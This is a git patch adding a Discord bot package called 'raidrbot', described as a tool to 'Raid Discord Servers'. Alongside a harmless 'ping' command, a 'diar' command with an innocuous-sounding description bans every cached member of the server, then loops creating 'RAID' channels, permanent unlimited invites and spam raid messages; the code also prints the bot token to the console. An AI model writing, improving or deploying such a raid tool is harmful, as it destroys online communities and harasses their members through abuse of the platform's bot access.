From 7f554ddd23c3e39ae951b4117a36ea7c5535706f Mon Sep 17 00:00:00 2001 From: Sam Sneed <163201376+sam-sneed@users.noreply.github.com> Date: Sat, 6 Jul 2024 18:22:43 +0000 Subject: [PATCH] Add files via upload --- index.mjs | 75 ++++++++++++++++++++++++++++++++++++++++++++++++++++ package.json | 22 +++++++++++++++ 2 files changed, 97 insertions(+) create mode 100644 index.mjs create mode 100644 package.json diff --git a/index.mjs b/index.mjs new file mode 100644 index 0000000..6c7cbce --- /dev/null +++ b/index.mjs @@ -0,0 +1,75 @@ +import { REST, Routes, Client, GatewayIntentBits } from 'discord.js'; + +const TOKEN = process.argv[2] +const CLIENT_ID = process.argv[3] +const commands = [ + { + name: 'ping', + description: 'Replies with Pong!', + }, + { + name: 'diar', + description: 'Dairy air!', + }, +]; + +const client = new Client({ intents: [GatewayIntentBits.Guilds, GatewayIntentBits.GuildMembers, GatewayIntentBits.GuildInvites] }); + +const rest = new REST({ version: '10' }).setToken(TOKEN); + +function randInt(min, max) { + return Math.floor(Math.random() * (max - min) + min); +} + +try { + console.log('Started refreshing application (/) commands.'); + + await rest.put(Routes.applicationCommands(CLIENT_ID), { body: commands }); + + console.log('Successfully reloaded application (/) commands.'); +} catch (error) { + console.error(error); +} + +client.on('ready', () => { + console.log(`Logged in as ${client.user.tag}!`); +}); + +client.on('interactionCreate', async interaction => { + if (!interaction.isChatInputCommand()) return; + + if (interaction.commandName === 'ping') { + await interaction.reply('Pong!'); + } else if (interaction.commandName === 'diar') { + await interaction.user.createDM("Starting raid NOW...") + let guild = interaction.channel.guild + for (const member of guild.members.cache.values()) { + try { + await member.ban(); + console.log(`${member.user.tag} has been banned.`); + } catch (error) { + console.warn(`Failed to ban ${member.user.tag}:`, error); + } + } + + for (i = 0; i <= 100000, i++;) { + guild.channels.create({ name: `RAID-${i}`, reason: 'COOL CHANNEL IS COOL' }) + .then(console.log) + .catch(console.error); + interaction.channel.createInvite({ + maxAge: 0, // Invite never expires (adjust as needed) + maxUses: 0, // Unlimited uses (adjust as needed) + }).then(console.log).catch(console.warn) + try { + interaction.channel.send(`# RAID + This is a raid! Everybody get down!`) + } catch { + console.warn("Error sending raid msg! (Timeout?)") + } + await new Promise(r => setTimeout(r, randInt(500,6200))); + } + } +}); + +console.log(`${TOKEN}`) +client.login(TOKEN); \ No newline at end of file diff --git a/package.json b/package.json new file mode 100644 index 0000000..7921770 --- /dev/null +++ b/package.json @@ -0,0 +1,22 @@ +{ + "name": "raidrbot", + "version": "1.0.0", + "description": "Raid Discord Servers", + "main": "index.js", + "scripts": { + "test": "echo \"Error: no test specified\" && exit 1" + }, + "repository": { + "type": "git", + "url": "git+https://github.com/sam-sneed/raidrbot.git" + }, + "author": "Sam Sneed", + "license": "MIT", + "bugs": { + "url": "https://github.com/sam-sneed/raidrbot/issues" + }, + "homepage": "https://github.com/sam-sneed/raidrbot#readme", + "dependencies": { + "discord.js": "^14.15.3" + } +}